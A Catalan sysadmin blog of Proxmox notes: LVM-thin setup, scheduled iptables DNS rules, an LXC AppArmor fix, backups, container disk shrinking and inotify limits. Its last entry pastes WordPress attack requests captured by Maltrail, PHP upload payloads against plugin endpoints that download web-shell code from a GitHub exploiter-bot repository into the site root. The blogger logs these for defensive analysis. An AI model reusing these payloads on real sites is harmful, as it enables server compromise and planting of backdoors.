dimecres, 3 de juliol del 2019

afegir disc ssd proxmox lmvthin

afegir disc ssd 480G sanddisk

fdisk /dev/sdd
n  nova partició primària
i type 8e

pvcreate --metadatasize 250k -y -ff /dev/sdd1
vgcreate ssd480 /dev/sdd1
crear volumen logic i modicar-lo a thin-client tipus
lvcreate -L 420G -n lvm-ssd480 ssd480
lvconvert --type thin-pool ssd480/lvm-ssd80


root@ies:~#               more /etc/pve/storage.cfg

lvmthin: localssd480
        thinpool lvm-ssd480
        vgname ssd480
        content images,rootdir


root@ies:~# pvesm status
Name                   Type     Status           Total            Used       Available        %
local                   dir     active        98559220        80857492        12652180   82.04%
local-2t            lvmthin     active      1887436800       619456757      1267980042   32.82%
local-lvm           lvmthin     active       850669568       126579631       724089936   14.88%
local-ssdlvm        lvmthin   inactive               0               0               0    0.00%
localssd480         lvmthin     active       440401920               0       440401920    0.00%
maquetacio-rafa        cifs     active      1786248964      1022766164       763482800   57.26%
nas-dlink               nfs     active      3840539008      3817249152        23289856   99.39%
root@ies:~#
root@ies:~#
root@ies:~# pvesm scan lvm
vmdata
pve
ssd480
root@ies:~# pvesm lvmthinscan ssd480
lvm-ssd480
root@ies:~# pvesm lvmthinscan pve
data
root@ies:~# pvesm lvmthinscan vmdata
vmstore


root@ies:~# pvesm list local-lvm
local-lvm:vm-104-disk-1   raw 21474836480 104
local-lvm:vm-106-disk-1   raw 4294967296 106
local-lvm:vm-116-disk-1   raw 4294967296 116
local-lvm:vm-118-disk-1   raw 4294967296 118
local-lvm:vm-120-disk-1   raw 8589934592 120
local-lvm:vm-211-disk-1   raw 34359738368 211
local-lvm:vm-330-disk-1   raw 68719476736 330
local-lvm:vm-330-disk-2   raw 68719476736 330
local-lvm:vm-510-disk-1   raw 8589934592 510
local-lvm:vm-550-disk-0   raw 34359738368 550
local-lvm:vm-609-disk-0   raw 8589934592 609
local-lvm:vm-719-disk-0   raw 30064771072 719
local-lvm:vm-721-disk-0   raw 8589934592 721
local-lvm:vm-741-disk-0   raw 8589934592 741

dijous, 25 d’octubre del 2018

regla tallafoc a un horari determinat

iptables -I FORWARD 1 -p tcp --sport 53 -d 10.1.1.0/22 -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -p tcp --sport 53 -d 10.1.23.0/24  -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -p udp --sport 53 -d 10.1.1.0/22  -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -p udp --sport 53 -d 10.1.23.0/24  -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -p tcp --sport 53 -d 10.1.6.0/24  -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1  -p udp --sport 53 -d 10.1.6.0/24  -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT

iptables -I FORWARD 1 -s 10.1.1.0/22 -p tcp --dport 53 -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -s 10.1.23.0/24 -p tcp --dport 53 -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -s 10.1.1.0/22 -p udp --dport 53 -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -s 10.1.23.0/24  -p udp --dport 53 -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -s 10.1.6.0/24 -p tcp --dport 53 -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT
iptables -I FORWARD 1 -s 10.1.6.0/24 -p udp --dport 53 -m time --timestart 18:30 --timestop 21:30 --weekdays Fri -j ACCEPT


regles per divendres des de 18:30 a 21:30 es poguin fer peticiones als servidors dns arrel o qualsevol altre extern.

dimarts, 2 d’octubre del 2018

ies kernel: audit: type=1400 audit(1538480598.585:12): apparmor="DENIED" operation="mount" info="failed mntpnt match" error=-13 profile="/usr/bin/lxc-start" name="/" pid=2180 comm="lxc-start" flags="rw, rslave"

error proxmox després d'actualitzar-se i no arrancar els contenidors lxc

pct start 400

AVC apparmor="DENIED" operation="mount" info="failed mntpnt match" error=-13 profile="/usr/bin/lxc-start" name="/" pid=2180 comm="lxc-start" flags="rw, rslave"

Oct 02 13:43:18 ies kernel: audit: type=1400 audit(1538480598.585:12): apparmor="DENIED" operation="mount" info="failed mntpnt match" error=-13 profile="/usr/bin/lxc-start" name="/" pid=2180 comm="lxc-start" flags="rw, rslave"

deprés de fer seguiment d'alguns links davant aquest error aquest m'ha funcionat


https://forum.proxmox.com/threads/apparmor-preventing-lxcs-starting-after-update.42060/

I needed to manually add
deb http://download.proxmox.com/debian/pve stretch pve-no-subscription then run apt-get full-upgrade (and update ofcourse) to fix it. I am writing this as a heads up to all other people who has the same problem and as sort of bug report.
 
 
 si, ara ja puc arrancar el container


i un membre de l'starff ja indica que és correcte afegir aquest repositori

if you don't have a subscription, you need to enable the no-subscription repository like described in the docs. otherwise, you don't get updates, and thus also no bug and security fixes.
 

divendres, 28 de setembre del 2018

listado de backups del día

root@hp350:/mnt/backup/dump# ls -lt|egrep 'Sep 28'|awk '{ print $9}'
vzdump-lxc-700-2018_09_28-03_15_20.log
vzdump-lxc-700-2018_09_28-03_15_20.tar.lzo
vzdump-qemu-515-2018_09_28-03_12_21.log
vzdump-qemu-515-2018_09_28-03_12_21.vma.lzo
vzdump-qemu-510-2018_09_28-03_11_35.log
vzdump-qemu-510-2018_09_28-03_11_35.vma.lzo
vzdump-qemu-504-2018_09_28-03_10_17.log
vzdump-qemu-504-2018_09_28-03_10_17.vma.lzo
vzdump-qemu-503-2018_09_28-03_09_34.log
vzdump-qemu-503-2018_09_28-03_09_34.vma.lzo
vzdump-qemu-502-2018_09_28-03_07_29.log
vzdump-qemu-502-2018_09_28-03_07_29.vma.lzo
vzdump-lxc-405-2018_09_28-03_03_06.log
vzdump-lxc-405-2018_09_28-03_03_06.tar.lzo
vzdump-lxc-404-2018_09_28-02_51_44.log
vzdump-lxc-404-2018_09_28-02_51_44.tar.lzo
vzdump-lxc-120-2018_09_28-02_50_44.log
vzdump-lxc-120-2018_09_28-02_50_44.tar.lzo
vzdump-lxc-118-2018_09_28-02_49_33.log
vzdump-lxc-118-2018_09_28-02_49_33.tar.lzo
vzdump-lxc-116-2018_09_28-02_48_27.log
vzdump-lxc-116-2018_09_28-02_48_27.tar.lzo
vzdump-lxc-108-2018_09_28-02_38_40.log
vzdump-lxc-108-2018_09_28-02_38_40.tar.lzo
vzdump-lxc-106-2018_09_28-02_36_29.log
vzdump-lxc-106-2018_09_28-02_36_29.tar.lzo
vzdump-lxc-104-2018_09_28-02_31_23.log
vzdump-lxc-104-2018_09_28-02_31_23.tar.lzo
vzdump-lxc-101-2018_09_28-02_30_02.log
vzdump-lxc-101-2018_09_28-02_30_02.tar.lzo

root@hp350:/mnt/backup/dump# ls -lt|egrep 'Sep 28'|awk '{ print $9}'|grep tar.lzo
vzdump-lxc-700-2018_09_28-03_15_20.tar.lzo
vzdump-lxc-405-2018_09_28-03_03_06.tar.lzo
vzdump-lxc-404-2018_09_28-02_51_44.tar.lzo
vzdump-lxc-120-2018_09_28-02_50_44.tar.lzo
vzdump-lxc-118-2018_09_28-02_49_33.tar.lzo
vzdump-lxc-116-2018_09_28-02_48_27.tar.lzo
vzdump-lxc-108-2018_09_28-02_38_40.tar.lzo
vzdump-lxc-106-2018_09_28-02_36_29.tar.lzo
vzdump-lxc-104-2018_09_28-02_31_23.tar.lzo
vzdump-lxc-101-2018_09_28-02_30_02.tar.lzo

hasta que lo afine la copia es:
rsync vzdump*2018_10_05* -A ies@192.168. :/mnt/usb


dijous, 27 de setembre del 2018

WARNING: Sum of all thin volume sizes (932.00 GiB) exceeds the size of thin pool pve/data and the size of whole volume group (931.26 GiB)!

fent una migració de màquines entre dos proxmox, em trobo amb aquest missatge d'alerta en una de les restauracions.

WARNING: Sum of all thin volume sizes (932.00 GiB) exceeds the size of thin pool pve/data and the size of whole volume group (931.26 GiB)!

alegrement he anat traspassant màquines pero em trobo que m'he quedat sense espai?
la suma dels espais em dona per sobre del límit que tinc

root@ies:~# lvscan
 ACTIVE            '/dev/pve/swap' [8.00 GiB] inherit
 ACTIVE            '/dev/pve/root' [96.00 GiB] inherit
 ACTIVE            '/dev/pve/data' [811.26 GiB] inherit
 ACTIVE            '/dev/pve/vm-330-disk-1' [64.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-330-disk-2' [64.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-403-disk-1' [100.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-402-disk-1' [108.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-108-disk-1' [21.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-118-disk-1' [4.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-116-disk-1' [4.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-120-disk-1' [16.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-104-disk-1' [20.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-101-disk-1' [13.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-106-disk-1' [4.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-400-disk-1' [208.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-206-disk-1' [202.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-510-disk-1' [8.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-520-disk-1' [32.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-502-disk-1' [32.00 GiB] inherit
 ACTIVE            '/dev/pve/vm-211-disk-1' [32.00 GiB] inherit

la suma de tots els termes em dona

64
64
100
108
21
4
4
16
20
13
4
208
202
8
32
32
32
932

Em miro la màquina 400
root@ies:~# pct enter 400
root@moodle:~# df -h
Filesystem                                          Size  Used Avail Use% Mounted on
/dev/mapper/pve-vm--400--disk--1  204G  144G   50G  75% /

on puc veure que tinc disponible 50 GB, miraré si puc reduir el tamany del disc amb el proxmox?

en alguna cerca de google trobo

 i tried with "pct resize 106 rootfs 80gb" (from 200gb)

But i get: "unable to shrink disk size"

de fet l'aplicatiu web de proxmox invalida posar valors negatius per decrementar

FINALMENT OPTO PER L'OPCIÓ MÉS LENTA, FER UNA BACKUP I RESTAURAR AMB UN TAMANY MÉS PETIT, aquestes imatges que hi han son només per manternir-se encesses pero no han de creixer ja, donat que son consultives només.

You probably figured it out already, but that seems to be a limitation of LXC containers, at least for now. From the pct man page :
  \+?\d+(\.\d+)?[KMGT]?
       The new size. With the + sign the value is added to the actual size of the volume and without it,
       the value is taken as an absolute one. Shrinking disk size is not supported.
If you truly want to shrink a container, I guess you'd have to perform a backup, then restore it with the --rootfs local: option, like so :
pct stop 
vzdump  -storage local -compress lzo
pct destroy 
pct restore  /var/lib/lxc/vzdump-lxc--....tar.lzo --rootfs local:

funciona fins ara per reduir i recuperar almenys 100GB de 4 màquines.

Of course, you can't perform this sort of resizing online, so I wouldn't call it a great solution, but it works if you have no other choice.
Good luck,
 
https://serverfault.com/questions/784890/how-to-shrink-the-disk-of-a-lxc-container-on-proxmox-4

dimarts, 25 de setembre del 2018

proxmox, error Unable to create new inotify object: Too many open files at /usr/share/perl5/PVE/INotify.pm line 390.

no puc crear més màquines a partir de l'script de creació de containers

Unable to create new inotify object: Too many open files at /usr/share/perl5/PVE/INotify.pm line 390.

Do you have lots of containers running? Then you probably ran into the inotify limits:
These are the defaults:
Code:
# sysctl fs.inotify
fs.inotify.max_queued_events = 16384
fs.inotify.max_user_instances = 128
fs.inotify.max_user_watches = 65536
Try increasing the instance limit, eg. # sysctl fs.inotify.max_user_instances=512

fet

root@proxmox-alumnes3:~# ./script-creacion-lxc-idnoigualip.sh 298-299
hola, tot sembla correcte-el nom del grup ser ¦.298-299
298
43
  Using default stripesize 64.00 KiB.
  Logical volume "vm-298-disk-1" created.
mke2fs 1.43.4 (31-Jan-2017)
Discarding device blocks: done
Creating filesystem with 2097152 4k blocks and 524288 inodes
Filesystem UUID: 06b5b002-1d79-4ccc-bd15-7fab5872182b
Superblock backups stored on blocks:
        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632

Allocating group tables: done
Writing inode tables: done
Creating journal (16384 blocks): done
Multiple mount protection is enabled with update interval 5 seconds.
Writing superblocks and filesystem accounting information: done

extracting archive '/var/lib/vz/template/cache/deb9-ssh.tar.gz'
Total bytes read: 569384960 (544MiB, 52MiB/s)
Detected container architecture: amd64
Creating SSH host key 'ssh_host_rsa_key' - this may take some time ...
Creating SSH host key 'ssh_host_dsa_key' - this may take some time ...
Creating SSH host key 'ssh_host_ecdsa_key' - this may take some time ...
Creating SSH host key 'ssh_host_ed25519_key' - this may take some time ...
Tue Sep 25 23:57:42 CEST 2018 :: es crea la maquina : 298
299
44
  Using default stripesize 64.00 KiB.
  Logical volume "vm-299-disk-1" created.
mke2fs 1.43.4 (31-Jan-2017)
Discarding device blocks: done
Creating filesystem with 2097152 4k blocks and 524288 inodes
Filesystem UUID: e4e1866e-7299-4518-93ee-01aac8259fde
Superblock backups stored on blocks:
        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632

Allocating group tables: done
Writing inode tables: done
Creating journal (16384 blocks): done
Multiple mount protection is enabled with update interval 5 seconds.
Writing superblocks and filesystem accounting information: done

extracting archive '/var/lib/vz/template/cache/deb9-ssh.tar.gz'
Total bytes read: 569384960 (544MiB, 105MiB/s)
Detected container architecture: amd64
Creating SSH host key 'ssh_host_dsa_key' - this may take some time ...
Creating SSH host key 'ssh_host_rsa_key' - this may take some time ...
Creating SSH host key 'ssh_host_ecdsa_key' - this may take some time ...
Creating SSH host key 'ssh_host_ed25519_key' - this may take some time ...

Tue Sep 25 23:58:17 CEST 2018 :: es crea la maquina : 299

dissabte, 22 de setembre del 2018

peticions detectades maltrail com a potencia php injection

peticio que arriba al servidor, he modificat el nom de domini del servidor per URL-DOMINI, donat que va buscant wp-admin, es tracta de sistema d'atac segurament a wordpress

suposso que cerquen algun tipus de vulnerabilitat pero només he pujat el contigut per un altre moment analitzar-ho.


URL-DOMINI/wp-admin/admin-ajax.php (POST --02485a6cfcd34a6fb9baa3826f1df2feContent-Disposition: form-data; name=%22action%22nm_personalizedproduct_upload_file--02485a6cfcd34a6fb9baa3826f1df2feContent-Disposition: form-data; name=%22name%22upload.php--02485a6cfcd34a6fb9baa3826f1df2feContent-Disposition: form-data; name=%22file%22; filename=%22settings_auto.php%22Content-Type: multipart/form-dataVuln!! patch it Now!
$im = curl_init($url); curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10); curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0); return curl_exec($im); curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){    echo $check.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploite), URL-DOMINI/wp-admin/admin-ajax.php?action=getcountryuser&cs=2 (POST --fb3e771fb1bc46fd8574153def3e543cContent-Disposition: form-data; name=%22popimg%22; filename=%22settings_auto.php%22Vuln!! patch it Now! $im = curl_init($url); curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10); curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0); return curl_exec($im); curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){    echo $check.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = fopen($check2, URL-DOMINI'w');fwrite($open2, URL-DOMINI$text2);fclose($open2);if(file_exists($check2)){    echo $check2.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;@unlink(__FIL), URL-DOMINI/wp-admin/admin-post.php (POST --73e122e8951f40d1ac6fdb8e1da1e423Content-Disposition: form-data; name=%22page%22pagelines--73e122e8951f40d1ac6fdb8e1da1e423Content-Disposition: form-data; name=%22settings_upload%22settings--73e122e8951f40d1ac6fdb8e1da1e423Content-Disposition: form-data; name=%22file%22; filename=%22settings_auto.php%22Vuln!! patch it Now! $im = curl_init($url); curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10); curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0); return curl_exec($im); curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){    echo $check.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = ), URL-DOMINI/wp-content/plugins/barclaycart/uploadify/uploadify.php (POST --6919b300ff3848a9aa59b607a4054b2dContent-Disposition: form-data; name=%22Filedata%22; filename=%22files/settings_auto.php%22Content-Type: multipart/form-dataVuln!! patch it Now! $im = curl_init($url); curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10); curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0); return curl_exec($im); curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){    echo $check.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = fopen($check2, URL-DOMINI'w');fwrite($open2, URL-DOMINI$text2);fclose($open2);if(file_exists($check2)){    echo $check2.%22%22;}else   echo %22n), URL-DOMINI/wp-content/plugins/cherry-plugin/admin/import-export/upload.php (POST --0b046a619cbb41288861f394d4dbb9cbContent-Disposition: form-data; name=%22file%22; filename=%22files/settings_auto.php%22Content-Type: multipart/form-dataVuln!! patch it Now! $im = curl_init($url); curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10); curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0); return curl_exec($im); curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){    echo $check.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = fopen($check2, URL-DOMINI'w');fwrite($open2, URL-DOMINI$text2);fclose($open2);if(file_exists($check2)){    echo $check2.%22%22;}else   ec)